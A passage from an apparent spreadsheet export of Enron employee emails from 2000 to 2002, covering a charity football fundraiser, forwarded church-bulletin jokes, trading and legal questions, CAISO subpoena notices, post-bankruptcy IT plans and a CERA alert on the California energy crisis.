as=20_x000D_
participants and fundraisers.  Contributions raised will benefit the genera=_x000D_
l=20_x000D_
scholarship fund=20_x000D_
for each school.=20_x000D_
_x000D_
The details:=20_x000D_
Date:    Saturday, November 18th=20_x000D_
_x000D_
Time:    10:00 a.m. - approximately 4 p.m. (Warm up is at 9:30 am)_x000D_
_x000D_
Location:   Stratford High School Practice Fields (just off Dairy Ashford,=_x000D_
=20_x000D_
south of I-10)_x000D_
_x000D_
Food and Drinks:  Schulze=01,s BBQ (FREE - courtesy of Enron)_x000D_
_x000D_
Eligibility:   Full-time employees and/or their spouses_x000D_
    (Players must have graduated from Texas A&amp;M_x000D_
 or The University of Texas )_x000D_
_x000D_
Team Jerseys:  Provided by Enron and Andersen Consulting=20_x000D_
_x000D_
Format:   7 players with at least 1 female player on the field at all times_x000D_
_x000D_
Team Size: Recommend 8-10 players per team (no more than 10 per team)=20_x000D_
 Contact the team captains to sign-up.  (Sign-up now to ensure your=20_x000D_
 place on a team)_x000D_
_x000D_
Prizes:    Winning team receives 16 tickets to the A&amp;M/UT game in=20_x000D_
Austin on Friday, November 24_x000D_
    Winning team also owns the "Horns Down/Horns Up" trophy=20_x000D_
until next year!_x000D_
_x000D_
Fundraising Goal  The committee has set a goal of raising $16,000 for each=_x000D_
=20_x000D_
school.  This will require a contribution of $2,000 per team,=20_x000D_
plus an equal amount from corporate matching funds._x000D_
_x000D_
Last year's event featured a last-minute comeback as the Enron Aggies Team =_x000D_
1=20_x000D_
defeated the Enron=20_x000D_
Longhorns Team 1 for the championship and took home the tickets and the=20_x000D_
trophy.  This year, expect=20_x000D_
the Longhorns (and Andersen Consulting) to come in with revenge on their=20_x000D_
minds!=20_x000D_
_x000D_
Thanks to the gracious gift from the UT Alumni, who redirected their=20_x000D_
donations to the A&amp;M Foundation,=20_x000D_
we were able to permanently endow scholarships dedicated to the memory of t=_x000D_
he=20_x000D_
12 Aggies who died=20_x000D_
in last year's Bonfire collapse.  We believe this event is a great traditio=_x000D_
n=20_x000D_
for both companies, and we are=20_x000D_
pleased to be able to raise important funds for both institutions._x000D_
_x000D_
If you are interested in participating or otherwise being involved, you mus=_x000D_
t=20_x000D_
contact one of the team captains=20_x000D_
below by the close of business on Friday, November 3 (phone or email).  Tea=_x000D_
m=20_x000D_
rosters will be filled on a=20_x000D_
first-come, first-served basis._x000D_
_x000D_
Aggies           Longhorns_x000D_
Brad Mauritzen  x33272             Webb Jennings x31944_x000D_
Russ Porter       x58410                  Michael Simmons x37942_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Jun 2000 00:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'murli.nagwani@enron.com'})</t>
  </si>
  <si>
    <t>Re: Hello from Murli</t>
  </si>
  <si>
    <t>Sounds great.  Let me know what your schedule is like._x000D_
_x000D_
Kevin</t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 07:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Energy West Resources</t>
  </si>
  <si>
    <t>Tana, I am attempting to put together a "spark spread" with Energy West _x000D_
Resources (AKA Energy West).  EPMI has a master in place with Energy West _x000D_
Resources Inc. their current and correct business name.   I understand we _x000D_
have an ISDA in place with Energy West Incorporated who is one and the _x000D_
same.   In addition to credit concerns, is there any problem doing a _x000D_
financial transaction with Energy West Resources Inc. under the name on the _x000D_
ISDA of Energy West Incorporated ?</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 02:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Fwd: Fw: Onward Christian Soldiers</t>
  </si>
  <si>
    <t xml:space="preserve">Some I've seen, some not.  These are sooo funny!  It's amazing what a typo _x000D_
can do to change the meanings!  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Dan J Hyvl_x000D_
	03/29/2001 09:20 AM_x000D_
		 _x000D_
		 To: Becky Spencer/HOU/ECT@ECT, Stacy E Dickson/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Fwd: Fw: Onward Christian Soldiers_x000D_
_x000D_
These are cute._x000D_
----- Forwarded by Dan J Hyvl/HOU/ECT on 03/29/2001 09:19 AM -----_x000D_
_x000D_
	Pat Radford_x000D_
	03/29/2001 09:10 AM_x000D_
		 _x000D_
		 To: Dan J Hyvl/HOU/ECT@ECT, Kaye Ellis/HOU/ECT@ECT, Jenny _x000D_
Helton/HOU/ECT@ect, Linda J Noske/HOU/ECT@ECT, aeanabors@aol.com_x000D_
		 cc: _x000D_
		 Subject: Fwd: Fw: Onward Christian Soldiers_x000D_
_x000D_
&gt; &gt; | Actual announcements placed in church bulletins ...._x000D_
&gt; &gt;_x000D_
&gt; &gt; | Our youth basketball team is back in action Wednesday at 8pm in the_x000D_
&gt; &gt; | recreation hall.  Come out and watch us kill Christ the King._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | Bertha Belch, a missionary from Africa will be speaking tonight at_x000D_
&gt; &gt; Calvary_x000D_
&gt; &gt; | Memorial Church in Racine. Come tonight and hear Bertha Belch all the_x000D_
&gt; &gt; way_x000D_
&gt; &gt; | from Africa._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | For those of you who have children and don't know it, we have a_x000D_
&gt; &gt; nursery_x000D_
&gt; &gt; | downstairs._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | Ladies, don't forget the rummage sale. It's a chance to get rid of_x000D_
&gt; &gt; those_x000D_
&gt; &gt; | things not worth keeping around the house. Don't forget your husbands._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | The peacemaking meeting scheduled for today has been canceled due to a_x000D_
&gt; &gt; | conflict._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | Ladies Bible Study will be held Thursday morning at 10am. All ladies_x000D_
&gt; &gt; are_x000D_
&gt; &gt; | invited to lunch in the Fellowship Hall after the B.S. is done._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | The sermon this morning: "Jesus walks on the water".  The sermon_x000D_
&gt; &gt; tonight_x000D_
&gt; &gt; | "Searching for Jesus."_x000D_
&gt; &gt; |_x000D_
&gt; &gt; | Barbara Jones remains in the hospital and needs blood donors for more_x000D_
&gt; &gt; | transfusions. She is also having trouble sleeping and requests tapes_x000D_
&gt; &gt; of_x000D_
&gt; &gt; | Pastor Jack's sermons._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | Remember in prayer the many who are sick of our community. Smile at_x000D_
&gt; &gt; someone who is hard to love. Say "hell" to someone who doesn't care much_x000D_
&gt; &gt; about_x000D_
&gt; &gt; you._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | Don't let worry kill you - let the church help._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | A bean supper will be held on Tuesday evening in the church hall._x000D_
&gt; &gt; Music_x000D_
&gt; &gt; | will follow._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | At the evening service tonight, the sermon topic will be "What is_x000D_
&gt; &gt; hell?"_x000D_
&gt; &gt; | Come early and listen to our choir practice._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | Eight new choir robes are currently needed, due to the addition of_x000D_
&gt; &gt; several_x000D_
&gt; &gt; | new members and to the deterioration of some older ones._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | The senior choir invites any member of the congregation who enjoys_x000D_
&gt; &gt; sinning_x000D_
&gt; &gt; | to join the choir._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | Pot luck supper Sunday at 5pm - prayer and medication to follow._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | The ladies of the church have cast off clothing of every kind. They_x000D_
&gt; &gt; may be_x000D_
&gt; &gt; | seen in the basement on Friday afternoon._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | This evening at 7pm there will be a hymn sing in the park across from_x000D_
&gt; &gt; the_x000D_
&gt; &gt; | church. Bring a blanket and come prepared to sin._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | The pastor would appreciate it if the ladies of the congregation would_x000D_
&gt; &gt; lend_x000D_
&gt; &gt; | him their electric girdles for the pancake breakfast next Sunday_x000D_
&gt; &gt; morning._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | Low Self Esteem Support Group will meet Thursday at 7pm. Please use_x000D_
&gt; &gt; the_x000D_
&gt; &gt; | backdoor._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | Weight Watchers will meet at 7pm at the First Presbyterian Church._x000D_
&gt; &gt; Please_x000D_
&gt; &gt; | use the large double doors at the side entrances._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | Mrs. Johnson will be entering the hospital this week for testes._x000D_
&gt; &gt; |_x000D_
&gt; &gt; | The associate minister unveiled the church's new tithing campaign_x000D_
&gt; &gt; slogan_x000D_
&gt; &gt; | last Sunday: "I Upped My Pledge - Up Yours"._x000D_
&gt; &gt; |_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Feb 2002 06:22:48 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'richard.baumfield@enron.com'})</t>
  </si>
  <si>
    <t>RE: Will you be in the office on Friday, 2/7?  I'd like to catch_x000D_
 up.  Sara</t>
  </si>
  <si>
    <t>Absolutely - - when do you want to meet?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shackleton, Sara  _x000D_
Sent:	Thursday, February 07, 2002 3:51 PM_x000D_
To:	Baumfield, Richard_x000D_
Subject:	Will you be in the office on Friday, 2/7?  I'd like to catch up.  Sara_x000D_
_x000D_
_x000D_
_x000D_
Sara Shackleton_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3801a_x000D_
Houston, TX  77002_x000D_
Ph:  (713) 853-5620_x000D_
Fax: (713) 646-3490</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 02:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Agave Price Spreadsheet</t>
  </si>
  <si>
    <t xml:space="preserve">Genaro Mendoza@ENRON_x000D_
01/05/2001 07:46 AM_x000D_
To: Darron C Giron/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Agave Price Spreadsheet_x000D_
_x000D_
Darron,_x000D_
_x000D_
 Can you please send to me the spreadsheet used to calculate the price for _x000D_
Agave? We have had price discrepancies and they would like to go over the _x000D_
different pricing compnents to determine were we differ._x000D_
_x000D_
Thanks,_x000D_
Genaro_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 03:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rcarroll@bracepatt.com', 'alan.comnes@enron.com', 'mary.hain@enron.com', 'gfergus@brobeck.com', 'mday@gmssr.com', 'richard.b.sanders@enron.com', 'susan.j.mara@enron.com'})</t>
  </si>
  <si>
    <t>RE: CAISO Notice: Message to Market Participants and Scheduling C_x000D_
 oord inators regarding CA ISO compliance with the EOB and CPUC subpoenas --_x000D_
 FOR YOUR INFORMATION</t>
  </si>
  <si>
    <t>I see no effective objection to what the ISO proposes.  I am surprised they_x000D_
have not produced the material sooner.  Mike Day_x000D_
_x000D_
-----Original Message-----_x000D_
From: Susan.J.Mara@enron.com [mailto:Susan.J.Mara@enron.com]_x000D_
Sent: Wednesday, December 13, 2000 9:56 AM_x000D_
To: Mary.Hain@enron.com; Richard.B.Sanders@enron.com;_x000D_
gfergus@brobeck.com; mday@gmssr.com; rcarroll@bracepatt.com;_x000D_
Alan.Comnes@enron.com_x000D_
Cc: Jeff.Dasovich@enron.com; James.D.Steffes@enron.com_x000D_
Subject: CAISO Notice: Message to Market Participants and Scheduling_x000D_
Coord inators regarding CA ISO compliance with the EOB and CPUC_x000D_
subpoenas -- FOR YOUR INFORMATION_x000D_
_x000D_
_x000D_
_x000D_
The ISO plans to comply with recent EOB and CPUC subpoenas unless FERC or a_x000D_
court tells them not to.  DO we care about this?_x000D_
_x000D_
Question for  Mary and Ron -- Are they trying to get around the FERC--_x000D_
given the CPUC's filing there asking for authority to get info?_x000D_
_x000D_
Also, as Mary is aware, the WPTF will be submitting a protest to SCE's_x000D_
request to FERC to have the ISO's MSC release data to SCE that the MSC_x000D_
claims identify those who have abused market power._x000D_
_x000D_
----- Forwarded by Susan J Mara/NA/Enron on 12/13/2000 09:47 AM -----_x000D_
_x000D_
_x000D_
"Fuller, Don"_x000D_
_x000D_
&lt;DFuller@cais        To:     ISO Market Participants_x000D_
_x000D_
o.com&gt;_x000D_
&lt;IMCEAEX-_O=CAISO_OU=CORPORATE_CN=DISTRIBUTION+20LISTS_CN=ISO+20MARKET+20PAR_x000D_
TICIPANTS@cai_x000D_
Sent by:             so.com&gt;_x000D_
_x000D_
"Happ, Susan"        cc:_x000D_
_x000D_
&lt;SHapp@caiso.        Subject:     CAISO Notice: Message_x000D_
to Market Participants and Scheduling Coord inators_x000D_
com&gt;                 regarding CA ISO compliance with_x000D_
the EOB and CPUC subpoenas_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
12/13/2000_x000D_
_x000D_
07:52 AM_x000D_
_x000D_
Please_x000D_
_x000D_
respond to_x000D_
_x000D_
"Sole,_x000D_
_x000D_
Jeanne"_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To Market Participants and Scheduling Coordinators:_x000D_
_x000D_
The CA ISO believes it has complied with its obligations under CA ISO_x000D_
Tariff_x000D_
section 20.3.4 as to the December 4 EOB subpoena and the September 21 CPUC_x000D_
subpoena.  Our reasoning is explained in the attached letter.  Accordingly,_x000D_
the CA ISO will comply with the EOB and  CPUC subpoenas on December 20_x000D_
unless it receives and order to the contrary from a court or the Federal_x000D_
Energy Regulatory Commission._x000D_
_x000D_
In addition, the CA ISO has received requests from the Federal Energy_x000D_
Regulatory Commission and the state agencies for information on generator_x000D_
unit outages.  This information is not subject to tariff section 20.3.4_x000D_
which protects only Generator Outage programs.  Nonetheless, the CA ISO is_x000D_
providing this notice as a curtesy matter.  The CA ISO will provide the_x000D_
requested information to FERC and the state agencies.  The CA ISO has in_x000D_
the_x000D_
past requested confidential treatment for information on the cause of an_x000D_
outage and projected in service date since this information could be used_x000D_
by_x000D_
Market Participants to manipulate the market, and it will make such a_x000D_
request as to cause and in service dates in the context of the current_x000D_
requests._x000D_
_x000D_
Jeanne M. Sol,_x000D_
Regulatory Counsel_x000D_
California ISO_x000D_
(916) 608-7144_x000D_
_____________________________________________________________________________x000D_
_x000D_
________________________________________x000D_
_x000D_
The Foregoing e-Mail Communication (Together With Any Attachments Thereto)_x000D_
Is Intended For The Designated Recipient(s) Only. Its Terms May Be_x000D_
Confidential And Protected By Attorney/Client Privilege or Other Applicable_x000D_
Privileges.  Unauthorized Use, Dissemination, Distribution, Or Reproduction_x000D_
Of This Message Is Strictly Prohibited._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
(See attached file: 12-12letter to genfinal.doc)</t>
  </si>
  <si>
    <t>Wed, 1 Mar 2000 02:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tom.chapman@enron.com'})</t>
  </si>
  <si>
    <t>A little something I worked up regarding Rio Bravo III</t>
  </si>
  <si>
    <t>Jeff--_x000D_
_x000D_
Over the last couple of weeks, I have been compiling some information _x000D_
regarding the Rio Bravo project and other Mexican affairs that Enron is or _x000D_
could be involved with.  This is not a complete list, but at least it is a _x000D_
starting point._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tom Chapman</t>
  </si>
  <si>
    <t>Fri, 30 Jun 2000 02:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jason.peters@enron.com', 'mary.cook@enron.com', 'sara.shackleton@enron.com'})</t>
  </si>
  <si>
    <t>ENA Financial Trading Forms</t>
  </si>
  <si>
    <t>Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 06/30/2000 09:45 AM -----_x000D_
_x000D_
	Susan Bailey_x000D_
	06/30/2000 09:10 AM_x000D_
		 _x000D_
		 To: Carol St Clair/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: ENA Financial Trading Forms_x000D_
_x000D_
Carol, _x000D_
_x000D_
Attached is a list of the current forms used by ENA.  The list also includes _x000D_
where the form can be located._x000D_
_x000D_
Let me know if additional forms should be included._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan S. Bailey_x000D_
Enron North America Corp._x000D_
1400 Smith Street, Suite 3806A_x000D_
Houston, Texas 77002_x000D_
Phone: (713) 853-4737_x000D_
Fax: (713) 646-3490_x000D_
E:mail:  Susan.Bailey@enron.com</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 09:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'d.hall@enron.com'})</t>
  </si>
  <si>
    <t>Weather Database</t>
  </si>
  <si>
    <t xml:space="preserve">Brent and Sally,_x000D_
_x000D_
After speaking with Richard Burchfield and Brian Hudson, I thought that it _x000D_
would be appropriate to update both of you and Beth as to IT's commitment.  _x000D_
Richard asked that he send out the message and I agreed.  One reason for _x000D_
doing this was to show that the Operations and IT groups are working together _x000D_
towards a common goal.  The other reason was to ensure that I had IT's buy-in _x000D_
to completing this database in a timely fashion._x000D_
_x000D_
Our main goal will be to deliver the basic tools that any trading business _x000D_
would need and then to continue to develop the more advanced analytics in Q1 _x000D_
2001.  The actual roll out will happen in phases prior to January so that we _x000D_
begin the new year with a complete database which includes deal capture, _x000D_
valuation, and the necessary reporting and accounting tools.  By using Brian _x000D_
Hudson's IT team I can be assured that the global needs are met._x000D_
_x000D_
I will be in the office next week if you want to discuss this further,_x000D_
_x000D_
Todd_x000D_
_x000D_
_x000D_
------------------- Forwarded by D Todd Hall/HOU/ECT on 09/13/2000 03:22 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Richard Burchfield_x000D_
09/12/2000 06:20 PM_x000D_
To: D Todd Hall/HOU/ECT@ECT_x000D_
cc: Sally Beck/HOU/ECT@ECT, Beth Perlman/HOU/ECT@ECT, Brian _x000D_
Hudson/LON/ECT@ECT, Stephen Stock/HOU/ECT@ECT _x000D_
Subject: Weather_x000D_
_x000D_
Todd,_x000D_
 Per our discussion on moving forward with the development of a Weather _x000D_
Trading and Valuation engine.  I have discussed the high level requirements _x000D_
with Joseph Koothrappaly and have identified an IT lead to manage the _x000D_
project. As discussed, the project will have the same project formula as the _x000D_
"Thunderball" project with 3-6 month deliverables. Also, the need to have _x000D_
co-operative development between Houston and London will be established for _x000D_
Global roll out of the Weather system. The main focus will be a intranet _x000D_
trade capture and position with a callable valuation engine. The plan calls _x000D_
for Phase I roll out for January 1, 2001.   Next steps will need to be _x000D_
discuss as soon as possible.  Topics that need to be addressed are definition _x000D_
of Phase I, joint development between Houston and London, and duel _x000D_
development between Steve Stock's valuation team and my trading team. Keep in _x000D_
mind that though multiple teams will have development assignments, one person _x000D_
will manage the effort across teams._x000D_
_x000D_
_x000D_
Richard_x000D_
</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 02:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.hodge@enron.com', 'elizabeth.sager@enron.com'})</t>
  </si>
  <si>
    <t>NRG bullet points</t>
  </si>
  <si>
    <t xml:space="preserve">Taking asset management to a new level of pain._x000D_
_x000D_
Commericial vision is to form a joint venture with NRG to manage a portfolio _x000D_
of generation assets.  I'm meeting with Janelle et al at 10:00 to discuss _x000D_
what we want to do. _x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 05/16/2001 09:38 _x000D_
AM ---------------------------_x000D_
From: William Keeney/ENRON@enronXgate on 05/16/2001 08:18 AM_x000D_
To: Tom May/Corp/Enron@Enron, David Marks/ENRON@enronXgate, Janelle _x000D_
Scheuer/ENRON@enronXgate, Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: NRG bullet points_x000D_
_x000D_
Attached is a rough outline of the information that we might want to _x000D_
incorporate into a LOI with NRG.  We can discuss this at the 10 AM meeting._x000D_
_x000D_
Thanks-_x000D_
Bill_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 01:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ricardo.perez@enron.com'})</t>
  </si>
  <si>
    <t>Ricardo,_x000D_
_x000D_
What is your extension ? _x000D_
_x000D_
I would like to ask you a few questions and talk to you about what data we _x000D_
have available._x000D_
_x000D_
Chris Dorland</t>
  </si>
  <si>
    <t>Fri, 4 Jan 2002 14:54:39 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'beth.perlman@enron.com'})</t>
  </si>
  <si>
    <t>FW: IT Plans for Estate</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
This was the e-mail that I referred to earlier._x000D_
_x000D_
Thanks for your help today._x000D_
_x000D_
Beth_x000D_
 -----Original Message-----_x000D_
From: 	Perlman, Beth  _x000D_
Sent:	Thursday, December 20, 2001 11:18 AM_x000D_
To:	Piper, Greg; Beck, Sally_x000D_
Cc:	Koehler, Anne C._x000D_
Subject:	IT Plans for Estate_x000D_
_x000D_
Greg,_x000D_
_x000D_
Just as a follow up to our conversation, I have serious concerns about the estate's ability to service IT requests.  The number of people that remain in the estate, that understand the gas and power systems, is limited (and we're receiving resignations now).  With this in mind, I would like to have the ability to outsource the IT department (applications, infrastructure) and potentially the back office staff to a consulting company (potentially Accenture or CGEY).  We would need to move the estate employees into this company and incentivize them to stay.  The consulting company could then supplement the staff and the Enron estate employees could now have a career path at the consulting company. _x000D_
_x000D_
To make this deal attractive, the consulting company would like to have the ability to create a services company and offer IT and fulfillment and processing services to other companies.  By the way, this could be done for other commodities outside gas and power.  The deal would have to include royalty payments to the estate for each additional services agreement.  The intent is to make the services company into a thriving business.  We would also want to sell Commodity Logic (IP included) to round out the services offering.  We could consider selling the IP to our EGM and EIM systems as well._x000D_
_x000D_
All in all, the intent is to bring value to the estate and support the estate while the businesses wind down or start up.  We must make sure that the NETCO agreement allows the estate to license the gas and power software in some capacity and continue to develop the applications._x000D_
_x000D_
As an aside, the estate cannot perform on the Bridgeline or AEP deals.  There are not enough resources that fully understand the system, therefore, we cannot maintain a fully operational production quality system.  These deals must either be moved to NETCO or we need to find another alternative (the above referenced services company or selling the software to AEP and Bridgeline)._x000D_
_x000D_
I know this is long winded, but I needed to get these points down on paper._x000D_
_x000D_
I am on vacation next week, but can be reached on my cell phone at 713-240-0919 or at my house in Kiawah at 843-768-6651.  I'll also have my Blackberry but reception is poor on the island!_x000D_
_x000D_
Have a great holiday._x000D_
_x000D_
Beth_x000D_
</t>
  </si>
  <si>
    <t>Fri, 13 Apr 2001 02:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kimberly.indelicato@enron.com'})</t>
  </si>
  <si>
    <t>Re: #581085.01</t>
  </si>
  <si>
    <t xml:space="preserve">Yes - it's with APB - I've changed it._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kimberly Indelicato                           04/13/2001 08:48 AM_x000D_
	_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: #581085.01_x000D_
_x000D_
Kate, Spoke with Prebon and they don't show this trade. Could it be with _x000D_
another Broker?_x000D_
_x000D_
KI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Jul 2001 15:15:48 -0700 (PDT)</t>
  </si>
  <si>
    <t>Revised Anadarko CA</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the revised CA per my discussion with their attorney.  Please review and forward to Anadarko._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 24 Jul 2001 05:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: are you coming?</t>
  </si>
  <si>
    <t xml:space="preserve">hunky_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jeff.Dasovich@enron.com [mailto:Jeff.Dasovich@enron.com]_x000D_
Sent: Tuesday, July 24, 2001 12:04 PM_x000D_
To: Nancy Sellers_x000D_
Subject: Re: are you coming?_x000D_
_x000D_
_x000D_
_x000D_
how's tomorrow night?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Nancy Sellers_x000D_
_x000D_
&lt;Nancy.Sellers@RobertMo        To:     "'Jeff Dasovich'"_x000D_
_x000D_
ndavi.com&gt;                     &lt;Jeff_Dasovich@enron.com&gt;_x000D_
_x000D_
cc:_x000D_
_x000D_
07/24/2001 01:45 PM            Subject:     are you_x000D_
coming?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Nancy_x000D_
(707) 251-4870 (phone)_x000D_
(707) 265-5446 (fax)_x000D_
"Plus je bois, mieux je chante"_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 21 Jan 2001 07:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: High Speed Regulation in California - CERA Alert</t>
  </si>
  <si>
    <t xml:space="preserve">Need a hard copy ... I don't have a password for cera_x000D_
_x000D_
_x000D_
_x000D_
=09Eric Benson_x000D_
=0901/20/2001 10:02 AM_x000D_
=09=09=20_x000D_
=09=09 To: Steven J Kean/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Ja=_x000D_
mes D=20_x000D_
Steffes/NA/Enron@Enron_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: High Speed Regulation in California - CERA Alert_x000D_
_x000D_
Steve, Rick and Jim -=20_x000D_
_x000D_
Below is an article from CERA that summarizes the current situation in=20_x000D_
California._x000D_
_x000D_
Eric_x000D_
_x000D_
+++++++++++++++++++++++++++++++++++++++_x000D_
_x000D_
----- Forwarded by Eric Benson/NA/Enron on 01/20/2001 09:59 AM -----_x000D_
_x000D_
=09webmaster@cera.com_x000D_
=0901/19/2001 05:16 PM_x000D_
=09=09=20_x000D_
=09=09 To: messages@cera.com_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: High Speed Regulation in California - CERA Alert_x000D_
_x000D_
_x000D_
_x000D_
Title: High Speed Regulation in California_x000D_
URL: http://www20.cera.com/eprofile?u=3D35&amp;m=3D2208_x000D_
_x000D_
_x000D_
A Feverish Pitch_x000D_
The pace of regulatory and political events in California has taken on the_x000D_
feverish pitch of the energy market crisis itself. Important decisions_x000D_
regarding a wide range of market structure issues are being made quickly at=_x000D_
=20_x000D_
the_x000D_
California Public Utilities Commission (CPUC) and the state Legislature,_x000D_
increasing the level of uncertainty most market participants already percei=_x000D_
ve_x000D_
in the quickly evolving California market. Sudden changes are being made to=_x000D_
=20_x000D_
the_x000D_
market structure, changes that used to require years in California=01,s com=_x000D_
plex_x000D_
regulatory and legislative proceedings._x000D_
_x000D_
As rolling blackouts have rippled through urban centers of Northern Califor=_x000D_
nia_x000D_
on January 17 and 18, including in portions of downtown San Francisco,_x000D_
Sacramento, and the Silicon Valley, state officials are scrambling to set u=_x000D_
p_x000D_
the appropriate credit mechanisms to ensure the continued delivery of scarc=_x000D_
e_x000D_
western energy supplies to California=01,s two largest utilities. Even at p=_x000D_
rices_x000D_
near $800 per megawatt-hour (MWh), the California Department of Water=20_x000D_
Resources_x000D_
(CDWR), attempting to buy power on behalf of Pacific Gas and Electric (PG&amp;E=_x000D_
)_x000D_
and Southern California Edison (SCE), has been unable to secure enough to k=_x000D_
eep_x000D_
the lights on. In the mean time, legal actions by some energy suppliers_x000D_
threaten to tip the utilities into bankruptcy=01*and are being held at bay =_x000D_
only=20_x000D_
by_x000D_
direct intervention of California=01,s governor._x000D_
_x000D_
Below is a summary of the various state actions being pursued concurrently:_x000D_
_x000D_
*California governor. California Governor Gray Davis continues to attempt t=_x000D_
o_x000D_
act on behalf of PG&amp;E and SCE to secure long-term contracts for supply from_x000D_
merchant generation owners and marketers in California. On the same front, =_x000D_
the_x000D_
governor has been negotiating with generators in an attempt to keep them fr=_x000D_
om_x000D_
seeking compensation through the courts for energy delivered to the utiliti=_x000D_
es._x000D_
Court-ordered reimbursement could prompt bankruptcy._x000D_
_x000D_
*Legislature. Bills have been approved to authorize continued power purchas=_x000D_
es_x000D_
on behalf of PG&amp;E and SCE by the CDWR, to restructure the independent syste=_x000D_
m_x000D_
operator=01,s (ISO) governing board to consist of five members appointed by=_x000D_
 the_x000D_
governor, to restrict the ability of the ISO to enter into a broader=20_x000D_
interstate_x000D_
regional transmission organization (RTO) without the explicit approval of_x000D_
California=01,s Electricity Oversight Board, and to prohibit the divestitur=_x000D_
e of_x000D_
the investor-owned utilities=01, remaining generating assets until 2006. Th=_x000D_
e_x000D_
vehicle for pursuing authorization of state bond financing for acquisition =_x000D_
of_x000D_
transmission assets and construction of new generation facilities is still_x000D_
being developed._x000D_
_x000D_
*California Public Utilities Commission. On January 18 the CPUC adopted a_x000D_
decision prohibiting the sale of SCE=01,s Mohave Generating Station to AES.=_x000D_
 This_x000D_
voids a sale that was announced but not closed. The CPUC also delayed=20_x000D_
decisions_x000D_
regarding SCE=01,s application to end its rate freeze and the prudency crit=_x000D_
eria_x000D_
for utilities entering into long-term supply contracts._x000D_
_x000D_
Some of these issues will continue to evolve as they progress along their_x000D_
respective and sometimes intersecting paths, and some will need to pass=20_x000D_
through_x000D_
multiple review bodies. This rapid and erratic evolution has not helped to_x000D_
decrease either the financial risk associated with supplying energy to_x000D_
California=01,s two largest utilities, or the level of uncertainty in devel=_x000D_
oping_x000D_
new generation to supply California in the future._x000D_
